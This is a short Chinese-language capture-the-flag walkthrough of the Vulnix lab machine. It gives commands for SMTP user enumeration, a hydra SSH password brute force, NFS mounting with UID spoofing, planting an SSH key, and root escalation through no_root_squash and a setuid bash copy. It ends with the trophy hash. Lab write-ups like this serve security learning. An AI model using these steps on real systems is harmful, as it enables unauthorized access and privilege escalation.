smtp-user-enum -M VRFY -U user.lst -t 192.168.107.5，可以发现用户vulnix、user、root存在
showmount -e 192.168.107.5，枚举NFS共享目录，发现/home/vulnix
mount -t nfs 192.168.107.5:/home/vulnix /tmp/nfs，但是需要用户口令才能访问目录
hydra -l user -P rockyou.txt ssh://192.168.107.5，爆破得到user口令为letmein
useradd -u 2008 vulnix，然后su vulnix，就可以进入/tmp/nfs
ssh-keygen，生成SSH公私钥，把公钥导入/tmp/nfs/.ssh/authorized_keys，就能SSH私钥登录vulnix用户
sudo -l发现可以凭借root身份修改/etc/exports
增加一行/root *(rw,no_root_squash)，也可以只把/home/vulnix的root_squash替换为no_root_squash，重启物理靶机
再次挂载/home/vulnix，把/bin/bash拷贝过来改4755权限，就能在SSH客户端用./bash -p提权root
trophy.txt:cc614640424f5bd60ce5d5264899c3be



